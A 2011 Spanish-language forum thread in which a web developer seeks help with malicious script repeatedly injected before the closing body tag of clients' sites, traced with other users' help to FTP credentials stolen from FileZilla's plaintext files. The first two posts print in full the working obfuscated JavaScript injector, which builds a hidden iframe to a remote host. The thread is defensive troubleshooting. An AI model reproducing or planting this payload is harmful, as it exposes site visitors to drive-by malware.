Virus en mis páginas webs

Iniciado por MrPoor, 5 Agosto 2011, 11:15 AM

0 Miembros y 1 Visitante están viendo este tema.

MrPoor

Buenos días soy Programador Web.

No sé como pero se ha metido un virus en casi todas las páginas webs de mis clientes.

La cuestión es que no veo un punto de entrada común salvo mi ordenador, me explico:

1. - Se ha introducido en tres aplicaciones diferentes: Joomla, Prestashop, y un CMS Propio.

Por eso "creo" que descarto cualquier tipo de bug de las aplicaciones, ya que es siempre el mismo virus en los tres tipo de aplicaciones, y no puede haber el mismo tipo de fallo.

2. ¿Puede ser fallo del servidor?, porque los tres tienen Apaches con con versiones diferentes. A no ser, que haya un fallo común no detectado en Apache o PHP, o algo que ignore.

Os dejo cabeceras de varios servidores afectados, en diferentes hosting (1and1, CDMON, stratos):


TTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:09:55 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html


3. Puede ser mi ordenador, según el Avast está límpio, y no tengo conexiones abiertas por netstat.exe (uso Windows).

No sé muy bien que puede ser,

Cualquier ayuda es bienvenida. Elimino el virus, y cada X tiempo vuelve a aparecer. Me está causando muchos problemas. No encuentro nada en Google, etc.

Dejo un extracto del virus, si lo necesitáis completo me decís por favor, donde subirlo:


<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o... Resto de virus...


Mpoor es de super guay

MrPoor

#1
Pongo el virus completo, pensaba que no me iba a dejar:

<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>

<script>var s,o=Math.atan(Math.tan(2));o*=2;o=Math.ceil(o);aa=document.createTextNode("ev"+"al");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>


Infecta diferentes ficheros, donde le da la gana.
Mpoor es de super guay

madpitbull_99

Puede que el servidor entero esté afectado y por tanto todos los dominios/vhosts que aloja.

Si estás usando un VPS lo más probable es que sea eso. Tampoco descartes la posibilidad de que se haya colado mediante alguna vulnerabilidad
de los CMS o del propio Apache.

Mira todos los scripts/ficheros en busca de alguno con nombre sospechoso (o no), podrías intentar hacer un grep para ver si hay algún script que añade ese
JS malicioso a los demás ficheros.

PD: Te lo muevo a seguridad. Ahí encaja mejor.



«Si quieres la paz prepárate para la guerra» Flavius Vegetius


[Taller]Instalación/Configuración y Teoría de Servicios en Red

MrPoor

Gracias por moverlo.

No uso VPS, y lo raro es que son 3 servidores distintos, unos están en CDMON, otros en Stratos y otros en 1and1, vamos tres proveedores diferentes. Son todos hosting compartido, no tengo acceso a la shell.

Es que no tengo ni idea.

Gracias de nuevo, y cualquier sugerencia bienvenida.

Tampoco tengo acceso a los logs. Uno puede que se me haya metido a través de un chat online ahora que recuerdo, pero el resto no tiene ese chat online, y como digo, son servidores diferentes, que para nada están relacionados.

Mpoor es de super guay

MrPoor

Una pista, ahora que me doy cuenta, que ha pasado en todos los clientes:

- No se añade a la base de datos, sino que sobreescribe el fichero a las páginas web, después antes fin de cierre del body


<SCRIPT DEL VIRUS>
</SCRIPT>
</body>
</html>

Curiosamente siempre ataca a los mismos ficheros en cada aplicacióin
Los permisos de las carpetas y subcarpetas son: 755 y los de ficheros 644

Por lo que solo admin o el dueño puede cambiarlo.

Todo comprobado, no hay ficheros ni carpetas con otros permisos de lectura.

Eso me hace descartar cualquier virus a nivel de aplicación. El dueño y grupo de los ficheros está correcto.

¿No parece esto más relacionado con mi cliente de FTP? Uso filezilla, pero una cosa rara es que el DreamWeaver me está fallando como nunca, se bloquea cosa que nunca hacia antes.

Pienso que algo puede haber robado los ficheros con los perfiles en Filezilla o DreamWeaver.

Hace poco quite un virus extraño, pero en descripción en internet no ponía ningún efecto de este tipo.

Por si esto puede ayudar.

Saludos.


Mpoor es de super guay

Novlucker

#5
La verdad no se me ocurre nada y es bastante curioso lo que dices, yo también me hubiese jugado por una infección del lado del proveedor, pero no tiene sentido si lo único que hay en común entre esos tres servidores eres tú.

Y no tienes acceso de shell a los servidores?

Prueba revisando tu pc con otro AV
http://foro.elhacker.net/software/cds_autoarrancables_de_recuperacion_para_casos_de_emergencia-t204137.0.html (ahí tienes unos booteables)
[Edito]

Ahora viendo tu respuesta si noto un pequeño detalle. Hace algunos días salió a la luz que Filezilla guarda las credenciales en texto plano, por lo que una función "útil" para un "bicho" es buscar los ficheros de este programa ... http://bit.ly/owLeNo
Yo que tú probaría cambiando las contraseñas :)

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

MrPoor

¡Si señor, lo estamos pillando!, casi seguro que es el filezilla.

He ido a:
C:\Documents and Settings\MIUSUARIO\Datos de programa\FileZilla y hay dos ficheros que contienen contraseñas en texto plano, como bien dice Novlucker.

Un fichero es filezilla.xml, que curiosamente tiene ahora mismo SOLO las contreseñas de los dos alojamiento infectados hoy, porque lo usé antes para eliminarlo, y el otro es sitemanager.xml, que ese sí contiene las contraseñas de todos mis sitios.

Os explico, el virus es clicico, afecto a 18 clientes en la primera vuelta, y hoy a comenzado la segunda, ayer infectó un sitio, y hoy 3. Está infectando ahora mismo.

¿Como podría pillarlo?
--------------------------
Se me ocurre tres formas:

1. Con un programa que vigile cuando un programa accede a un fichero. O sea, un filemonitor pero al revés.

2: cojo el fichero sitemanager.xml y lleno el campo <pass></pass> de A'es, a ver si provoca un overflow (con suerte está mal programado), y salta la ventana de windows, etc

3. eliminio el fichero sitemanager.xml, con suerte se cuelga el bicho.

Me imagino que no tienen una copia local, porque como digo es cíclico, supongo que revisa todo cada x tiempo por si hay un sitio nuevo.

¿sabéis algún programa que haga el punto 1 para Windows XP?
¿alguna otra solución?

Repito, el virus está infectando por ahí ahora mismo.

Saludos.
Mpoor es de super guay

Novlucker

Para la opción 1 puedes usar Process Monitor agregando un filtro por PATH.
Aunque tienes que estar atento y limpiar el log cada un rato porque es una bestialidad la cantidad de datos que recolecta y puede llegar a colgarse :P

Podrías intentar también subiendo el nivel del Firewall si lo tienes, de modo que en cuanto el "bicho" intente conectarse salte.

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

.:UND3R:.

creo que el problema es por parte de tu computador, recuerda que no por que tu antivirus no detecte virus, quiere decir que no los tengas...

-los archivos que son modificados, solo pueden ser alterados por el administrador, ahora crea un html y verifica si este se modifica inmediatamente o demora, me refiero en el tiempo en que tú estás modificando,o accediendo a la web como administrador, puede ser que tengas algún troyano enviado por la competencia, ya teniendo tu contraseña están editando el index, lo que puedes hacer para eso es ver los accesos con las IP así descartas si es un troyano, aunque este podría modificar el index desde tu mismo computador, hace otra prueba entra desde otro ordenador y que este nunca haya tenido acceso con el ordenador en el que estás (USB,CD,ETC) crea un fichero, html y ve si este se ha modifcado ahí podrás saber de donde viene el problema, te recomiendo que de todas formas cambies la contraseña lo antes posible.

creo que con lo que te comenté podrás acorralar el causante del problema, saludos

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

MrPoor

Buenas de nuevo,

Como dice .:UND3R:. en problema está en mi ordenador, sin duda. Explico:

Tengo un cliente que no está en el Filezilla. Ayer se infectaron otros que no estaban infectados y ese cliente no. Por lo tanto:

1. 100% seguro tiene que ver con el Filezilla y las contraseñas en texto plano.
2. Pasé un escaneo completo del avast, y encontró un bicho en la carpeta system-volumen-information. Lo eliminé sin verificar que era (fallo).

3. Con el process monitor, veo una cosa rara:

Cuando abro filezilla, unos  segundos después se abre el svchost.exe



Uploaded with ImageShack.us

En sucesivas pruebas, si abro y cierro  rápido el Filezilla el svchost.exe no se lanza.

El svchost es un servicio legítimo de Windows, y se arranca con la ruta legítima (c:\windows\system32\svchost.exe.

El svchost en algo así como un lanzador de procesos, y ese PID en concreto, lanza esto:

C:\WINDOWS\system32\svchost.exe -k netsvcs

Ahí continúo investigando en Google, pero la información es imprecisa, hay páginas que dicen que es un virus, hay otras que dicen que es un servicio legítimo, etc.

La cuestión es que, en la carpeta c:\windows\system32\ no está tal fichero.

¿puede estar troyanizado el propio svchost, o el filezilla.exe?

Mpoor es de super guay